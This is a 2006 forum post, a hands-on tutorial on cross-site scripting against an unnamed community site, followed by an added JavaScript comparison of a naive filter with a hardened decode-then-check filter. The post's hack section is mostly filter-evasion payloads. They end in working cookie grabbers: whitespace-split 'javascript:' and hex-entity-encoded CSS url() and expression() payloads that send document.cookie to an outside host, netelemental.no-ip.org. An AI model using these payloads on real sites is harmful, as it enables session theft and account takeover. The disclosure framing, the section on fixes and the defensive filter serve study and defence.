Xss

#1 nepali_dude

Posted 04 March 2006 - 11:15 AM

Cross Site Scripting('XSS') By Example

Table of Contents
1. Why this was written
2. The objective
3. The hack
4. The dangers of the results
5. The solution
6. Resources

1. Why this was written
To me cross site scripting is, apart from perhaps social engineering, the biggest threat to online communities these days. Many sites, including the undisclosed site that is used here, are vulnerable to cross site scripting. The undisclosed site shall hereby be known as victim.com. I have also, as a second goal, written this paper to alert victim.com about their security holes and how they can fix them. As I look now, the site has 109,000,000+ users and it amazes me that this flaw has not been found before. I will also be looking to create a mock-up, with no resemblance to the original site, of course, that I will be releasing to the security community at hackthissite.org if they want it, or on my own site if they do not. By the time you read this, victim.com will probably have already fixed the security holes I highlight in this paper. I will be submitting this to victim.com with a week to go before I release this paper to the Internet and all of its occupants. I will only release the name of victim.com with their permission, and it would be nice to have a small section, or even just a comment in the source code, stating that the site has benefited from my help.

2. The objective
In this example, our victim site allows you to create 'mini' communities that have their own rules, ranks, chat boards, and can have competitions and such. These communities get a small place where they can put HTML to make their community look better and better fit the theme. For example, a community that loves dogs might use HTML to put pictures of dogs everywhere. I would also like to note at this time that this is most likely a multibug, as there are other places where you can put HTML for others to view, and I suspect the site has a single security function or class.
We will attempt to exploit the fact that they let you use HTML so that we can inject javascript. If we can inject javascript, we can in fact take control of user accounts and either use javascript to automatically manipulate the user accounts, such as forcing the user to join the community whether they want to or not if they so much as look at the front page, or stealing the 'points' of the user by making them buy an expensive item from the user. This could also be used to redirect users to porn websites or websites that place viruses, spyware, adware, or other malicious content on the user's computer.

3. The hack
Ok so we know we can use HTML, but they say that they don't allow javascript so let's see how true that is. We start with the simple stuff first, so that means we start with the script tag.

<script>alert('0wned')</script>

The resulting HTML

-blocked-alert('XSS')-blocked-

Hmm so they actually do block script tags! What a surprise! Ok so next what if we can put a link that will link to some javascript?

<a href="javascript:alert('0wned')">Click Here</a>

The resulting HTML

-blocked-Click Here</a>

Ah, OK, so they filter that too. I see that they erased the entire <a> tag though, so what if we put the javascript in an image?

<img src="javascript:alert('0wned')" />

But wait... An error message! src attributes are limited to ending in certain values! (Note: this error message has been modified to protect the identity of the original site.)

Sorry! src embedded files may only end in:

.mp3
.jpeg
.gif
.bmp
.midi
.wav
.jpg
.mid
.png

You may not use any form of the <src=alink> tag to embed files that end in

”javascript:alert(0wned from the url: ”javascript:alert(0wned

Even if you didn't use 'img src', this still applies to all tags that have 'src' in them. For example, 'background src'.

What about if we used a comment to bypass this filter?

<img src="javascript:alert('0wned.gif')" />

The resulting HTML

-blocked-

Ok, so now is where we begin the REAL filter evasion. What if we use CaPs to try and bypass filters that look only for same case strings?

<img src="jAvAsCrIpT:alert('0wned.gif')" />

The resulting HTML

-blocked-

Ok, what if we injected hex? You need a tool to do this. I recommend Burp Proxy, a proxy that runs on localhost:8080 and lets you view, block, and alter requests.

<img src="%6a%41%76%41%73%43%72%49%70%54:alert('owned.gif')" />

The resulting HTML

-blocked-

Uh oh, they still got us... Let's change tack. Let's use a DIV.

<DIV STYLE="background-image: url(javascript:alert('0wned'))">

The resulting HTML

-blocked-

Hmm so far it seems that it looks for any tag with 'javascript' in it. What if we break it up?

<DIV STYLE="background-image: url(j

ava scri
pt:alert('0wned'))">

Don't ask me why, but this IS valid javascript/HTML in IE. I am using Firefox, so I have to switch to IE to test this.

The resulting HTML

<DIV STYLE="background-image: url(j

ava scri
pt:alert('0wned'))">
Immediately upon seeing this I switched to IE, and guess what? A message box entitled '0wned' popped up! So, next step: a simple, obvious cookie grabber.

<DIV STYLE="background-image: url(j

ava scri
pt:document.location='http://netelemental.no-ip.org/cookie.php?cookie='+document.cookie)">

The resulting HTML

<DIV STYLE="background-image: url(j

ava scri
pt:document. &nbsp; &nbsp; location='http://netelemental.no-ip.org/cookie.php?cookie='&dagger;document. &nbsp; &nbsp; cookie))">
Let's try using eval to get past this.

<DIV STYLE="background-image: url(j

ava scri
pt:eval(\"docu\"+\"ment.location='http://netelemental.no-ip.org/c.php?c='+doc\"+\"ument.cookie\"))">

The resulting HTML:

<DIV STYLE="background-image: url(j

ava scri
pt:-blocked-"docu"&dagger;"ment.location='http://netelemental.no-ip.org/c.php?c='&dagger;doc"&dagger;"ument.cookie”))">
Ok, so they change document AND eval so that it renders javascript useless while at the same time not affecting the look of a valid document. Ok, what if we converted this to HTML hex, since it is in a CSS statement?

<DIV STYLE="background-image: url(j

ava scri
pt:&#x64;&#x6F;&#x63;&#x75;&#x6D;&#x65;&#x6E;&#x74;&#x2E;&#x6C;&#x6F;&#x63;&#x61;&#x74;&#x69;&#x6F;&#x6E;&#x3D;&#x27;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x6E;&#x65;&#x74;&#x65;&#x6C;&#x65;&#x6D;&#x65;&#x6E;&#x74;&#x61;&#x6C;&#x2E;&#x6E;&#x6F;&#x2D;&#x69;&#x70;&#x2E;&#x6F;&#x72;&#x67;&#x2F;&#x63;&#x6F;&#x6F;&#x6B;&#x69;&#x65;&#x2E;&#x70;&#x68;&#x70;&#x3F;&#x63;&#x6F;&#x6F;&#x6B;&#x69;&#x65;&#x3D;&#x27;&#x2B;&#x64;&#x6F;&#x63;&#x75;&#x6D;&#x65;&#x6E;&#x74;&#x2E;&#x63;&#x6F;&#x6F;&#x6B;&#x69;&#x65;)">

The resulting HTML

<DIV STYLE="background-image: url(j

ava scri
pt:&#x64;&#x6F;&#x63;&#x75;&#x6D;&#x65;&#x6E;&#x74;&#x2E;&#x6C;&#x6F;&#x63;&#x61;&#x74;&#x69;&#x6F;&#x6E;&#x3D;&#x27;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x6E;&#x65;&#x74;&#x65;&#x6C;&#x65;&#x6D;&#x65;&#x6E;&#x74;&#x61;&#x6C;&#x2E;&#x6E;&#x6F;&#x2D;&#x69;&#x70;&#x2E;&#x6F;&#x72;&#x67;&#x2F;&#x63;&#x6F;&#x6F;&#x6B;&#x69;&#x65;&#x2E;&#x70;&#x68;&#x70;&#x3F;&#x63;&#x6F;&#x6F;&#x6B;&#x69;&#x65;&#x3D;&#x27;&#x2B;&#x64;&#x6F;&#x63;&#x75;&#x6D;&#x65;&#x6E;&#x74;&#x2E;&#x63;&#x6F;&#x6F;&#x6B;&#x69;&#x65;)">
Guess what? We have the cookie! I have tried and it works. Now you can simply use your knowledge of javascript to do anything you want. Since I have also found another way to do this, I will go ahead and disclose it.

<DIV STYLE="width: expression(&#x64;&#x6F;&#x63;&#x75;&#x6D;&#x65;&#x6E;&#x74;&#x2E;&#x6C;&#x6F;&#x63;&#x61;&#x74;&#x69;&#x6F;&#x6E;&#x3D;&#x27;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x6E;&#x65;&#x74;&#x65;&#x6C;&#x65;&#x6D;&#x65;&#x6E;&#x74;&#x61;&#x6C;&#x2E;&#x6E;&#x6F;&#x2D;&#x69;&#x70;&#x2E;&#x6F;&#x72;&#x67;&#x2F;&#x63;&#x6F;&#x6F;&#x6B;&#x69;&#x65;&#x2E;&#x70;&#x68;&#x70;&#x3F;&#x63;&#x6F;&#x6F;&#x6B;&#x69;&#x65;&#x3D;&#x27;&#x2B;&#x64;&#x6F;&#x63;&#x75;&#x6D;&#x65;&#x6E;&#x74;&#x2E;&#x63;&#x6F;&#x6F;&#x6B;&#x69;&#x65;)">

The resulting HTML

<DIV STYLE="width: expression(&#x64;&#x6F;&#x63;&#x75;&#x6D;&#x65;&#x6E;&#x74;&#x2E;&#x6C;&#x6F;&#x63;&#x61;&#x74;&#x69;&#x6F;&#x6E;&#x3D;&#x27;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x6E;&#x65;&#x74;&#x65;&#x6C;&#x65;&#x6D;&#x65;&#x6E;&#x74;&#x61;&#x6C;&#x2E;&#x6E;&#x6F;&#x2D;&#x69;&#x70;&#x2E;&#x6F;&#x72;&#x67;&#x2F;&#x63;&#x6F;&#x6F;&#x6B;&#x69;&#x65;&#x2E;&#x70;&#x68;&#x70;&#x3F;&#x63;&#x6F;&#x6F;&#x6B;&#x69;&#x65;&#x3D;&#x27;&#x2B;&#x64;&#x6F;&#x63;&#x75;&#x6D;&#x65;&#x6E;&#x74;&#x2E;&#x63;&#x6F;&#x6F;&#x6B;&#x69;&#x65;)">

4. The dangers of the results
Here you can see that once injected, javascript can steal a user's cookies, which means that the attacker can 'log in' as the user by presenting those cookies as the attacker's own. Especially if an admin got their cookies stolen, this is a huge danger to the site. It cannot compromise the server, but it can compromise any user account that can be lured into viewing that page. Also, functions such as document.forms[x].submit() can force the user to change settings or perform actions they do not want to. An attacker that really wanted full control could even use AJAX to mimic ANY action that the user could perform.

5. The solution
Simple. Simply alter the filter to convert such HTML hex back into ASCII, and continue applying the normal filters. Also put extra filters on CSS so that CSS can't be a source of problems in the future, e.g. make sure only certain CSS tags are used. Better yet, create your own style markup language to disallow unwanted tags. Another GREAT solution is to force your users to use a web browser other than Internet Explorer. Please notice that these XSS exploits work ONLY in IE.

6. Resources
http://centricle.com/tools/ascii-hex/
http://ha.ckers.org/xss.html
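The following is an added example, not part of nepali_dude's post and not victim.com's code. It puts an assumed model of the site's filter (reconstructed from the "resulting HTML" shown in section 3: percent-decode, drop anything containing "script"/"javascript:" in any case, mangle eval, document and +) next to a hardened filter that applies the fix from section 5: decode every encoding back to plain text, collapse the whitespace IE tolerated, and only then check. The payloads are the post's own with quotes straightened; the benign dog-picture markup, the function names and the helper regexes are constructed for this example.

```javascript
// Added example (not from the original post or from victim.com): naive filter
// as the post observed it, versus a decode-then-check filter. Payloads are the
// post's; the `benign` case is constructed here.
const PAYLOADS = {
  scriptTag: "<script>alert('0wned')</script>",
  hrefJs: "<a href=\"javascript:alert('0wned')\">Click Here</a>",
  imgJs: "<img src=\"javascript:alert('0wned')\" />",
  imgJsGif: "<img src=\"javascript:alert('0wned.gif')\" />",
  imgCaps: "<img src=\"jAvAsCrIpT:alert('0wned.gif')\" />",
  imgUrlHex: "<img src=\"%6a%41%76%41%73%43%72%49%70%54:alert('owned.gif')\" />",
  divJs: "<DIV STYLE=\"background-image: url(javascript:alert('0wned'))\">",
  divSplit: "<DIV STYLE=\"background-image: url(j\n\nava scri\npt:alert('0wned'))\">",
  divEntities: "<DIV STYLE=\"background-image: url(j\n\nava scri\npt:&#x64;&#x6F;&#x63;&#x75;&#x6D;&#x65;&#x6E;&#x74;&#x2E;&#x63;&#x6F;&#x6F;&#x6B;&#x69;&#x65;)\">",
  divExpression: "<DIV STYLE=\"width: expression(&#x64;&#x6F;&#x63;&#x75;&#x6D;&#x65;&#x6E;&#x74;&#x2E;&#x63;&#x6F;&#x6F;&#x6B;&#x69;&#x65;)\">",
  benign: "<DIV STYLE=\"background-image: url(dogs.gif)\"><img src=\"dog.jpg\" /></DIV>", // constructed
};

// ASSUMED model of victim.com's filter, reconstructed from the post's results.
// It never decodes &#x..; entities and never looks across whitespace.
function naiveFilter(html) {
  const s = html.replace(/%([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
  if (/<script/i.test(s) || /javascript\s*:/i.test(s)) return "-blocked-";
  return s
    .replace(/eval\(/gi, "-blocked-")
    .replace(/document\./gi, "document. &nbsp; &nbsp; ")
    .replace(/\+/g, "&dagger;");
}

// One round of decoding: numeric and common named HTML entities plus %xx.
// %xx is decoded by regex, not decodeURIComponent(), so a stray "%" elsewhere
// in the input cannot make the whole decode throw and get skipped.
const fromCp = (n) => (n <= 0x10ffff ? String.fromCodePoint(n) : "");
function decodeOnce(s) {
  const named = { amp: "&", lt: "<", gt: ">", quot: '"', apos: "'" };
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => fromCp(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => fromCp(parseInt(d, 10)))
    .replace(/&(amp|lt|gt|quot|apos);/gi, (_, n) => named[n.toLowerCase()])
    .replace(/%([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Canonical form used for CHECKING only (never for output): decode until
// stable (encodings can be nested), strip whitespace and control characters
// (IE accepted "j\nava scri\npt:"), then lower-case.
function canonicalize(s) {
  let out = s;
  for (let i = 0; i < 4; i++) {
    const next = decodeOnce(out);
    if (next === out) break;
    out = next;
  }
  return out.replace(/[\s\u0000-\u001f]/g, "").toLowerCase();
}

// Tripwire tokens checked against the canonical form of the whole submission.
const DANGEROUS = ["<script", "javascript:", "vbscript:", "expression(", "-moz-binding", "behavior:", "@import"];
// Extension list from the site's own error message in section 3.
const ALLOWED_EXT = /\.(mp3|jpe?g|gif|bmp|midi?|wav|png)$/;

// A resource reference may be a relative path or an http(s) URL, nothing else,
// and its path (query/fragment stripped) must end in an allowed extension.
function allowedResource(ref) {
  const path = ref.replace(/^['"]|['"]$/g, "").split(/[?#]/)[0];
  const scheme = /^([a-z][a-z0-9+.-]*):/.exec(path);
  if (scheme && !/^https?$/.test(scheme[1])) return false;
  return ALLOWED_EXT.test(path);
}

// Hardened check: returns { ok, reason }. Tags are tokenized with a regex for
// brevity; a production filter should run on a real HTML parser's output.
function hardenedFilter(html) {
  const canon = canonicalize(html);
  for (const bad of DANGEROUS) {
    if (canon.includes(bad)) return { ok: false, reason: `contains ${bad}` };
  }
  const tagRe = /<\s*([a-z][\w-]*)([^>]*)>/gi;
  const attrRe = /([a-z_:-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const tag = m[1].toLowerCase();
    if (["script", "iframe", "object", "embed", "meta", "link"].includes(tag)) {
      return { ok: false, reason: `<${tag}> not allowed` };
    }
    attrRe.lastIndex = 0;
    let a;
    while ((a = attrRe.exec(m[2])) !== null) {
      const name = a[1].toLowerCase();
      const value = canonicalize(a[2] || a[3] || a[4] || "");
      if (name.startsWith("on")) return { ok: false, reason: `event handler ${name}` };
      if (name === "style") {
        for (const u of value.matchAll(/url\(([^)]*)\)/g)) {
          if (!allowedResource(u[1])) return { ok: false, reason: `style url(${u[1]})` };
        }
      } else if (["src", "background", "lowsrc", "dynsrc"].includes(name)) {
        if (!allowedResource(value)) return { ok: false, reason: `${name}=${value}` };
      }
    }
  }
  return { ok: true, reason: null };
}

// Run every payload through both filters. `naivePassed` means the modelled
// site filter would have stored the markup unchanged.
function compare() {
  const result = {};
  for (const [name, html] of Object.entries(PAYLOADS)) {
    result[name] = { naivePassed: naiveFilter(html) === html, hardenedOk: hardenedFilter(html).ok };
  }
  return result;
}

console.table(compare());
```

Under the naive model the three DIV payloads that worked in the post (split word, hex entities, expression()) pass untouched while every earlier attempt is blocked, which matches the post's results; the hardened filter rejects all ten and keeps the dog pictures. The canonical form is only ever compared against, never stored or echoed back, because stripping whitespace and decoding entities would change what the browser renders.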



